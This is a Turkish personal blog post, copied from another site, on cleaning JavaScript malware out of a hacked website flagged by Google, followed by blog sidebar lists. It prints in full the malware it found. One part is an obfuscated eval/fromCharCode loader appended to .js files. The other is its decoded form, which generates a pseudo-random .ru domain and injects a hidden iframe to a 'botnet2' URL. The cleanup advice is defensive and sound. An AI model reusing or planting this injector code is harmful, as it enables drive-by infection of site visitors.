-
İçerikler özgün değildir. Sadece sık sık lazım olan işime yarayacak olan notları almış olduğum kişisel bloğumdur.
20 Şubat 2014 Perşembe
Bu site bilgisayarınıza zarar verebilir – JavaScript virüs temizliği
Kaynak:http://www.buradayaziyor.com/index.php/2012/07/bu-site-bilgisayariniza-zarar-verebilir/
Burada yanlış giden bir şeyler var
Web sitesine virüs bulaşır mı ? Diye daha önce merak etmediyseniz ve bu makaleyi okuyorsanız sizi çok iyi anlıyorum.Muhtemelen exploit olarak adlandırılan veya iframe virüsü olarak bilinen zararlı kodlardan bir tanesi dosyalarınıza veya veritabanınıza bulaşmış olmalı.
Olasılıklar bitmiyor hizmet aldığınız veya hizet verdiğiniz sunucunuzda veya hosting panelinde bulunan açıklardan bir tanesi hacker veya lamerler tarafından kurcalanmış ve bulunmuş olabilir.
Bu sıralar, Javascript dosyalarına zarar veren saldırılarda bir artış var, Javascript virüsü olarak ta bilinen bu zararlı kodlardan kurtulmanın tek yolu, dosyalarınızı zararlı kodlardan temizlemek.
Google arama sonuçlarında internet sitesiniz için ” Bu site bilgisayarınıza zarar verebilir ” uyarısı ile karşılaşıyorsanız bu uyarıyı kaldırmak için yapmanız gereken işlemler burada yazıyor.
Google Webmaster Tools hizmetinden faydalanmak için hesap açın ve internet sitenizi ekleyerek, size uygun doğrulama yöntemlerinden birisini seçin ve hesabınızı doğrulayın.
Öncelikle internet sitenize bulaşan virüsün nereden geldiğini anlamanız gerekiyor.
Benim tahminim: Büyük olasılık ile virus internet sitenizdeki dosyalarda olmalı.
Benim en son karşılaştığım virüs,
Javascript (*.js) dosyalarına giren ve js dosyasının sonuna, aşağıdaki kırmızı satırları ekleyerek;
daha aşağıdaki mavi satırların olduğu sonucu çıkartan zararlı kod parçacığıydı.
/*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")](“p”);q.appendChild(q+”");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr=”fromChar”;f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,
240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,
192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,
630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,
696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,
492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,
192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,
192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,
690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,
750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,
696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,
660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,
550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,
200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,
230,618,505,696,360,666,585,684,575,240,205,192,310,192,245,300,160,378,160,294,160,348,160,288,295,60,
160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,
294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,
350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,
420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,
350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,
160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,
160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,
325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,
520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,
160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,
600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,
160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,
684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,
462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,
600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,
630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,
505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,
515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,
160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,
200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,
455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,
515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,
220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,
580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,
465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,
684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,
192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,
606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,
550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,
246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,
192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,
240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,
192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,
505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,
192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,
500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,
192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,
408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,
160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,
580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,
600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,
192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,684,505,582,580,606,345,
648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,
160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,
690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,
505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,
606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,
575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,
160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,
305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,
230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,
550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,
666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,
192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,
240,288,205,354];v=”eva”;}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?”Code”:”");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e(“j%2″))));}
if(f)e(s);}
/*qhk6sa6g1c*/
function nextRandomNumber() {
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if (test > 0) {
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
var d = new Date(unix * 1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max) {
return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone) {
var rand = new RandomNumberGenerator(unix);
var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
var str = '';
for (var i = 0; i < length; i++) {
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setTimeout(function() {
try {
if (typeof iframeWasCreated == "undefined") {
iframeWasCreated = true;
var unix = Math.round(+new Date() / 1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {}
}, 500);
Virüs bulaşmış internet sitesinin kaynak koduna baktığınız zaman,
Mavi ile yazılmış kodları görebilir ve ftp ‘deki dosyalarınızda bunları aradığınız zaman bulamazsanız,
tuhaflık sizde değil, sadece yanlış arama yönteminizde.
tuhaflık sizde değil, sadece yanlış arama yönteminizde.
İnternet tarayıcınızda yukarıdaki mavi scripti sonuc olarak gösteren,
Kırmızı scripti aramanız ve temizlemeniz gerekiyor.
Kırmızı scripti aramanız ve temizlemeniz gerekiyor.
Bu işlemleri yapmadan önce ve yaptıktan sonra
http://urlquery.net/
sayfasından sorgulama yapmanızı tavsiye ederim, böylece internet
siteniz ile ilgili dosyalarda yaptığınız değişikliklerin olumlu sonuç
verip vermediğini görebilirsiniz.Aşağıda gördüğünüz ilk resim internet sitenizde zararlı kod bulunduğunu belirtiyor.
zararlı kodları silip temizledikten sonra urlquery internet sitesinden denetlemenizde ve
benzeri hizmet veren diğer sitelerden de kontrol etmenizde fayda var, diğer sitelere örnek olarak şunları belirtebiliriz.
http://www.unmaskparasites.com/
http://sitecheck.sucuri.net/scanner/
Yukarıda yazan sayfaları kullanarak tekrar denetleyip, yaptığınız işten emin olduktan sonra;
Google Webmaster Tools ve StopBadware.org sayfalarına, internet sitemizdeki zararlı kodları kaldırdığınız ile ilgili bildirimde bulunursanız daha hızlı sonuç alabilirsiniz.
Bu işleri ne kadar kısa sürede yaparsanız, kara Listeden o kadar çabuk çıkarsınız.
Aşağıda yazanların arayanlar da var ise, konunuz burası
İnternet siteme virüs bulaştı ,
internet sitesi virüsü temizleme ,
web sitesi virüs uyarısı
Önümüzdeki günlerde temizlik işlemi için küçük bir uygulama yayınlamayı dşünüyorum, haberdar olmak veya yanlışlarımı düzeltmek isteyenler burada yazıyor olabilirler, çünkü saat 03:00 oldu oluyor, gözlerim kapandı kapanıyor, yazım hataları veya anlamsız kelimelerin vals gösterisi için kusura bakmayın…
Kaydol:
Kayıt Yorumları
(
Atom
)
search this website
email updates
Like us on facebook
Katkıda bulunanlar
Blogger tarafından desteklenmektedir.
Etiketler
- AJAX (3)
- alertbox (1)
- android (1)
- Asp.net (22)
- blogger (1)
- bootstrap (2)
- C# (1)
- Canvas (3)
- capture (2)
- datetime (1)
- dizüstü (1)
- dizüstü bilgisayardan interneti paylaştırmak (1)
- editör yapma (1)
- facebook api (1)
- Flash (1)
- format (1)
- geometri (6)
- google (1)
- Graf (1)
- Graf Teorisi (1)
- Hatalar (4)
- Html (1)
- html5 (2)
- iframe (1)
- ilköğretim (4)
- javascript (2)
- jquery (7)
- JSON (2)
- kablosuz (1)
- Karakter (1)
- Kodlama örnekleri (2)
- kütle (4)
- Laravel (2)
- laravel g-zip (1)
- Listbox (1)
- Matematik (20)
- matematikistan (2)
- matematikistan.net (16)
- mongoDB (1)
- msdos (1)
- mysql (4)
- netbeans (1)
- phonegap (1)
- php (3)
- php ile benzer tags (1)
- php similar tags (1)
- routing (2)
- Samsung (1)
- Save (1)
- Save Canvas (2)
- SOAP (1)
- tags (1)
- tarih (1)
- Thumbnail (1)
- Türkçe (1)
- türkçe karakter (1)
- Türksat 4A (1)
- url routing (2)
- utf-8 (1)
- Validation Kontrolleri (3)
- wifi (1)
- WYSIWYG (1)
- WYSIWYG editör (1)
- xml (1)
İşe Yarar Siteler
Blog Archive
-
2014
(91)
- Aralık (1)
- Kasım (4)
- Ekim (9)
- Eylül (5)
- Ağustos (3)
- Nisan (1)
- Mart (20)
-
Şubat
(28)
- asp.net hata ve çözümleri
- Link Değişimi Page Rank Değerini yükseltme
- Bu site bilgisayarınıza zarar verebilir – JavaScri...
- Youtube Videolarından Küçük Resim Çekmek
- Asp.Net de İç İçe Repeater Kullanımı
- Asp.net String İşlemleri
- Asp.net ikili listbox
- Asp.Net Listbox Text ve Value Ekleme
- JQuery Seçiciler ve Filtreler
- ASP.NET Rastgele Sayı ve Harf Üretme
- Ajax Get ve POST methodu ile XMLHTTPRequest
- Bilgisayar Donanımlı Ortamda Fonksiyon ve Graf
- Asp.net ile başka sitenin görüntüsünü alma(Thumbnail)
- Asp.Net ile ekran görüntüsü yakalama(printscreen)
- JavaScript Canvas Image Conversion
- Camera and Video Control with HTML5
- Jquery ile sayfa yükleniyor gifi
- Kısa Flash Notları
- ASP.NET ScriptService
- jquery click event
- Matematikistan.net
- Fraktal ve Fraktal Geometri Nedir
- javascript-hata-bulma-ve-sikistirma-javascript-com...
- Asp.Net Gzip ile Sayfa Sıkıştırma
- Validation hata mesajlarını alertbox ile gösterme
- Asp.net validition karşılaşılan hatalar
- IFrame İçerisindeki Veriye JavaScript ile Erişme
- Asp.Net Canvas Resim Kaydetme
- Ocak (20)
Popular Posts
-
TCPDF de font türkçe destekli bile olsa zaman zaman sıkıntı yaratabiliyor. Yapılacak işlemler şunlar 1- http://fonts.snm-portal.com/ fon...
-
Kaynak: https://www.zdaylan.com/c-system-tray-uygulamayi-gorev-cubugunda-calistirma/ formun özelliklerinden ShowInTaskbar Özelliğini Fal...
-
How to delete, disable and exit Demo Live Unit Retail Mode on the Samsung Galaxy S5 1. The first thing to do is to disable the retail mod...
-
kaynak:http://www.daltinkurt.com/Icerik/186/Zip-ve-Unzip-Islemleri.aspx Hotmail' in, gelen epostaların ekini indirme seçeneklerind...
-
Alıntıdır:http://www.adobeturk.com/forum/1-vt5688.html?postdays=0&postorder=asc&&start=0 Merhaba bazı flash ile ilgili...
-
Alıntı:http://www.zafercelenk.net/post/2010/06/23/SQL-ile-Kay%C4%B1tlar%C4%B1-Sayal%C4%B1m.aspx Geliştirdiğiniz uygulamalarda veritabanı...
-
Öncelikle http://htmlagilitypack.codeplex.com/ sitesinden Html Agility Pack i indiriyoruz sonra projemizde sağ üstdeki solution ex...
-
Dosyaya erişim izni verme sudo chmod -R 777 /home/sixven/camp_sms/inputs
-
Her ülkede, değişik seviyedeki okullarda matematik öğretiminin gerekliliği tartışmasız kabul edilmektedir. Öğrencilerin matematik dersinde ...
-
Özet:Eğitimin temel öğelerinden biri, öğretme ve öğrenme etkinlikleridir (Fidan, 1996). Eğitim amaçlarının gerçekleşmesinde öğretim-öğretm...
© Arif Erzin Bloğu-Kendime Notlar 2013 . Powered by Bootstrap , Blogger templates and RWD Testing Tool
Hiç yorum yok :
Yorum Gönder